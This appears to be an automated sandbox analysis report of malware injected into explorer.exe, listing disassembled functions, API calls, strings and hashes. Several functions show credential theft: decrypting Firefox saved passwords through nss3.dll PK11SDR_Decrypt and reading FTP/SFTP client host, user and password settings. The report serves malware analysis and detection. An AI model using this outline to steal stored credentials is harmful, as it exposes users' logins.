                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 032745CD
                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 03274657
                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 03274679
                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 0327469F
                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 032746C5
                                                                        • wsprintfW.USER32 ref: 0327471E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                        • API String ID: 2230072276-1234691226
                                                                        • Opcode ID: af43655965a6aef20e955db43326b716376903ecbb70edeed9a6822de3b27d86
                                                                        • Instruction ID: 93b80fb5acc9948faa4f86ab546d7b51d3a690a7160ef62cae59279736b70da6
                                                                        • Opcode Fuzzy Hash: af43655965a6aef20e955db43326b716376903ecbb70edeed9a6822de3b27d86
                                                                        • Instruction Fuzzy Hash: FCB16771214302AFD700EF65C884E6AB7E9FFC9744F14895CF5998B260DB71E84ACB62
                                                                        Function 032724B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 03271090: lstrlenW.KERNEL32(?,?,00000000,032717E5), ref: 03271097
                                                                          • Part of subcall function 03271090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 032710A8
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 03272503
                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0327250A
                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 03272563
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 03272570
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 03272591
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0327259E
                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 032725AB
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 032725B8
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 032725C5
                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 032725D2
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 032725DF
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                        • API String ID: 3366569387-3272982511
                                                                        • Opcode ID: 56772df1c0f4211b2e9cdc6ec4671725150bf7e94ffcf6831f58150b753dff28
                                                                        • Instruction ID: 5153622469711ad304b454f19f72a18f74b795578e285b5359ea3aa8cdbd8146
                                                                        • Opcode Fuzzy Hash: 56772df1c0f4211b2e9cdc6ec4671725150bf7e94ffcf6831f58150b753dff28
                                                                        • Instruction Fuzzy Hash: 5B415935E31352CFCB64FF35A85852E7AE9FF84640708482FD8419B60ADFB4A8A5CB51
                                                                        Function 03275E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03275BF5: memset.NTDLL ref: 03275C07
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 032760E1
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 032760EC
                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 03276113
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0327618E
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 032761B5
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 032761C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allrem$memset
                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                        • API String ID: 2557048445-1989508764
                                                                        • Opcode ID: 6400ac730fe6bb183fe70d44702ac1c99d122b9a61ac8140e0ab87452f2cad20
                                                                        • Instruction ID: 31727e1be742aa9cdb47cea0819ff7b700d77b78f50ea7ce12432f865659d374
                                                                        • Opcode Fuzzy Hash: 6400ac730fe6bb183fe70d44702ac1c99d122b9a61ac8140e0ab87452f2cad20
                                                                        • Instruction Fuzzy Hash: 68B15DB1938783AFD721DE28CC84B3AFBD4FB42244F2C0649F482A6191E7B5D9D086D5
                                                                        Function 0328D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcmp.NTDLL(032C637A,BINARY,00000007), ref: 0328D324
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                        • API String ID: 1475443563-3683840195
                                                                        • Opcode ID: b86c070a67a108adec61f16a2ccd1c46ae9f43603fba93a93af5571fb6947f2a
                                                                        • Instruction ID: d052a54a36f909248436d5102ec8eae753161d64c540150b83161bfcc26fadf7
                                                                        • Opcode Fuzzy Hash: b86c070a67a108adec61f16a2ccd1c46ae9f43603fba93a93af5571fb6947f2a
                                                                        • Instruction Fuzzy Hash: 0151D231535340AFC720EF68CC41A7AB3A5BB45600F09496DF9A19B2D2D3F0E8C9CB91
                                                                        Function 032748B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 03274845
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 0327488F
                                                                          • Part of subcall function 0327482C: lstrlenW.KERNEL32(?), ref: 03274897
                                                                        • wsprintfW.USER32 ref: 032749A7
                                                                        • wsprintfW.USER32 ref: 032749B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                        • API String ID: 2889301010-4273187114
                                                                        • Opcode ID: b326bcfe71268696b20f517bd52a507827e0108b06ac85175036c302b7017159
                                                                        • Instruction ID: 34a19daeab04aaf22b27d30303f7a52e0ba6d71e96400c49419a9c882955674f
                                                                        • Opcode Fuzzy Hash: b326bcfe71268696b20f517bd52a507827e0108b06ac85175036c302b7017159
                                                                        • Instruction Fuzzy Hash: AF31F426728355ABC710FB66CC4582FB6EEFFCA644B094A1DB44587240DBF2DCC187A1
                                                                        Function 0327F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0327FB32
                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0327FB4D
                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0327FB60
                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0327FB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                        • API String ID: 3510742995-3408036318
                                                                        • Opcode ID: 59758a06381dc12ef1a07fbeda1d810a4a97e3aa1c4f3a1a8c4e97f8c25fb888
                                                                        • Instruction ID: 5fa76e5a0883ef0c0e975cfee12c7e065d212f4983a586e0567c45c04341bbe8
                                                                        • Opcode Fuzzy Hash: 59758a06381dc12ef1a07fbeda1d810a4a97e3aa1c4f3a1a8c4e97f8c25fb888
                                                                        • Instruction Fuzzy Hash: 34D1E6B16283429FD714DF28C880B2ABBE5BF85314F08456DEC998F391D7B5D884CB62
                                                                        Function 03277820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$-x0$NaN
                                                                        • API String ID: 0-62881354
                                                                        • Opcode ID: b1202de026ca804524fc15f3900d183cc6f08055882f08ef1e718138a746994f
                                                                        • Instruction ID: ddbee00bde8d18413674d4f62a34de04efa2b4a32daf7aa6a3e89378f794c51f
                                                                        • Opcode Fuzzy Hash: b1202de026ca804524fc15f3900d183cc6f08055882f08ef1e718138a746994f
                                                                        • Instruction Fuzzy Hash: 78D1E1306387928BD725CA2C849473AFBE5BF8A604F18499DF8C297251D6B4C9C5C792
                                                                        Function 032778B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 5f7a6c1fce62a4968dfe7f4b19c11dbbad8d188254c9f717c27f8cc4ce95d550
                                                                        • Instruction ID: 065fcdfd15b936628cc0ec0a237a423dcb6b235dd1f383d44526dd29d92f0d58
                                                                        • Opcode Fuzzy Hash: 5f7a6c1fce62a4968dfe7f4b19c11dbbad8d188254c9f717c27f8cc4ce95d550
                                                                        • Instruction Fuzzy Hash: 86E1D230A387838BD725CA2C849473AFBE5BF8A604F18499DE8C297351D6B5C9C5C792
                                                                        Function 03277A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 8a709f2a89a5930f5ad167561af7faec53476829ebb5fb5ec6be0403e27f91d5
                                                                        • Instruction ID: 9d208bb1cdd0d9d022c339704e532be3dfee8e4a74af668b69152108e90f4110
                                                                        • Opcode Fuzzy Hash: 8a709f2a89a5930f5ad167561af7faec53476829ebb5fb5ec6be0403e27f91d5
                                                                        • Instruction Fuzzy Hash: 45E1F2346387828BD725CE2C849473AFBE5BF8A604F18499DE8C29B351D6B1C9C5C792
                                                                        Function 03277A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 495f9ff68ecf24e9cc573ed70f354874fb460ad25c4230889521ed4d6a0d5f82
                                                                        • Instruction ID: 58153feeb46dd5555efffff6a3c23f872b87a5a375754d5db1576299442ab964
                                                                        • Opcode Fuzzy Hash: 495f9ff68ecf24e9cc573ed70f354874fb460ad25c4230889521ed4d6a0d5f82
                                                                        • Instruction Fuzzy Hash: 90E1E2346387838BD725CE2C849473AFBE5BF8A604F18499DE8C287251D6B4C9C5C792
                                                                        Function 032777F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: a8202176460708c3a171561d06799318153d433a9424df398ca106e3383ac139
                                                                        • Instruction ID: 7f0b99f686d5bcb4d62288b8c6c681ff63a63b1c663ce35b6d096fe9536295d4
                                                                        • Opcode Fuzzy Hash: a8202176460708c3a171561d06799318153d433a9424df398ca106e3383ac139
                                                                        • Instruction Fuzzy Hash: 21E1DF306387828FD725CA2C849473AFBE5BF8A604F18499DE8C297351D6B4C9C5CB92
                                                                        Function 032770C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0327720E
                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 03277226
                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0327727B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldvrm$_aullrem
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 105165338-3447725786
                                                                        • Opcode ID: ec636fdc1592cf449ba1e8a439c40f66fe4cba66ad74e105c2004feabc243991
                                                                        • Instruction ID: 922d64c40d9aeaa0bf385c1c9c7f9880c949b76b2cdd7642bf04415426b5f72e
                                                                        • Opcode Fuzzy Hash: ec636fdc1592cf449ba1e8a439c40f66fe4cba66ad74e105c2004feabc243991
                                                                        • Instruction Fuzzy Hash: 31D1D0306387838BD725CA2C849473AFBE5BF8A604F18499DF8C297251D6B4C9C5C792
                                                                        Function 0327898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 03278AAD
                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 03278B66
                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 03278C9B
                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 03278CAE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldvrm
                                                                        • String ID: .
                                                                        • API String ID: 115548886-248832578
                                                                        • Opcode ID: 7528773562056b105ca584f1ccdd7ca037c408fb26c80ab5d16d09927bcae108
                                                                        • Instruction ID: 7792c1de001adc73ca9bc3a4c91b9cd5817499da5c6351e4ff24a334c69affa7
                                                                        • Opcode Fuzzy Hash: 7528773562056b105ca584f1ccdd7ca037c408fb26c80ab5d16d09927bcae108
                                                                        • Instruction Fuzzy Hash: 33D108B292C7858BC714DF19848922EFBF9FBC5710F084D9EF5D596280E3B1C9858786
                                                                        Function 0329D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: ,$7$9
                                                                        • API String ID: 2221118986-1653249994
                                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction ID: fcdcbb973bf17bc347285512a2191134428667ceef6c4bc0fbd0bb4d2a602b4c
                                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction Fuzzy Hash: 6C318F755083849FD730DF60D880B8FBBE8AF85340F00492EE98997291EBB1E548CB93
                                                                        Function 03271BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271BCC
                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,03272E75,PathToExe,00000000,00000000), ref: 03271BF0
                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03272E75,PathToExe,00000000,00000000), ref: 03271C05
                                                                        • lstrlenW.KERNEL32(00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271C1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: .exe
                                                                        • API String ID: 1659193697-4119554291
                                                                        • Opcode ID: b8f7227160735458d19ee2a8f993cc91ddff62992279df8e4dd8bc8af9a8fddf
                                                                        • Instruction ID: 1ad5db94e96d63f2eb7d3de94d482008f0c54648189e1366fc938c76c372d987
                                                                        • Opcode Fuzzy Hash: b8f7227160735458d19ee2a8f993cc91ddff62992279df8e4dd8bc8af9a8fddf
                                                                        • Instruction Fuzzy Hash: 04F0FC313302229BD334AF75AC496BF6295FF01741718582DE082D3151F7B099D1C759
                                                                        Function 03272112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03272127
                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0327213A
                                                                        • wsprintfA.USER32 ref: 0327214F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                        • String ID: %li
                                                                        • API String ID: 4120667308-1021419598
                                                                        • Opcode ID: e8e6343fa449d1437860ec136c511e92767258589b2df03395ec494be02ea84e
                                                                        • Instruction ID: dc28736dc52c46dbc1dcce6a5ec182ee3afe41890a74189641a06d99cf1b3f5c
                                                                        • Opcode Fuzzy Hash: e8e6343fa449d1437860ec136c511e92767258589b2df03395ec494be02ea84e
                                                                        • Instruction Fuzzy Hash: DEE0D8326603087BC7207BB9AC0AFEF7B6CDF40A56F044295F900E6646D5F29A6483D5
                                                                        Function 03282FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 0328316F
                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 032831D2
                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 032832DE
                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 032832E7
                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 03283392
                                                                          • Part of subcall function 032816CD: memset.NTDLL ref: 0328172B
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldivmemset
                                                                        • String ID:
                                                                        • API String ID: 3880648599-0
                                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction ID: d3b5dd23dc3568069600faeb8c54b1aa98b767bf20462dfcb31b00bf78899747
                                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction Fuzzy Hash: C8D1A2796253418FDB24EF69C48075EB7E5FF84B04F18492DFA9587290DBB0D885CB82
                                                                        Function 032A87FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                        • API String ID: 0-384346570
                                                                        • Opcode ID: 333e604fb8c4f4df345e58c5f674546dd3790475c15ca1ba3d6162b20a3cb80b
                                                                        • Instruction ID: 9ffd3bcb0a42f5323f0b6a3fd280e6acb5db9b271834600c2edd561b67a6d788
                                                                        • Opcode Fuzzy Hash: 333e604fb8c4f4df345e58c5f674546dd3790475c15ca1ba3d6162b20a3cb80b
                                                                        • Instruction Fuzzy Hash: E1D13B747187019FEB18DF29D480B2FBBE9ABC8750F14491EF9458B290DBB4D981CB92
                                                                        Function 032796BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 032796E7
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03279707
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03279739
                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0327976C
                                                                        • _allmul.NTDLL(?,?,?,?), ref: 03279798
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allmul
                                                                        • String ID:
                                                                        • API String ID: 4215241517-0
                                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction ID: cc414f0b1d7ffaf68729d9b578ac6e53136f51abe7c28a452e5dfc6105c93347
                                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction Fuzzy Hash: ED210ABA5747961BD734DD1B4CC0BEBB59EFB966A1F28022DED0186250EBF294C08161
                                                                        Function 0328B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 0328B1B3
                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 0328B20F
                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 0328B28A
                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0328B298
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1484705121-0
                                                                        • Opcode ID: 3766a68bedd863e95d934f15287972b5f793fcad9d4dc72eb3d2845f8db0f868
                                                                        • Instruction ID: e1d90b59a3e770c99f4c7753ae3d2ed2feb5ce117b1b9654048608342150c382
                                                                        • Opcode Fuzzy Hash: 3766a68bedd863e95d934f15287972b5f793fcad9d4dc72eb3d2845f8db0f868
                                                                        • Instruction Fuzzy Hash: 4C4139796293419FC714EF15C89092FFBE5AFC8600F04892DF9958B291DB71EC85CB92
                                                                        Function 03271895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 032718A7
                                                                        • GlobalLock.KERNEL32(03274B57), ref: 032718B6
                                                                        • GlobalUnlock.KERNEL32(?), ref: 032718F4
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 032718E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 1688112647-0
                                                                        • Opcode ID: 53fe5c75ce735af9f328831f578cfa4e1cfb8c6bf62a0f6aff7af70ddc1665ae
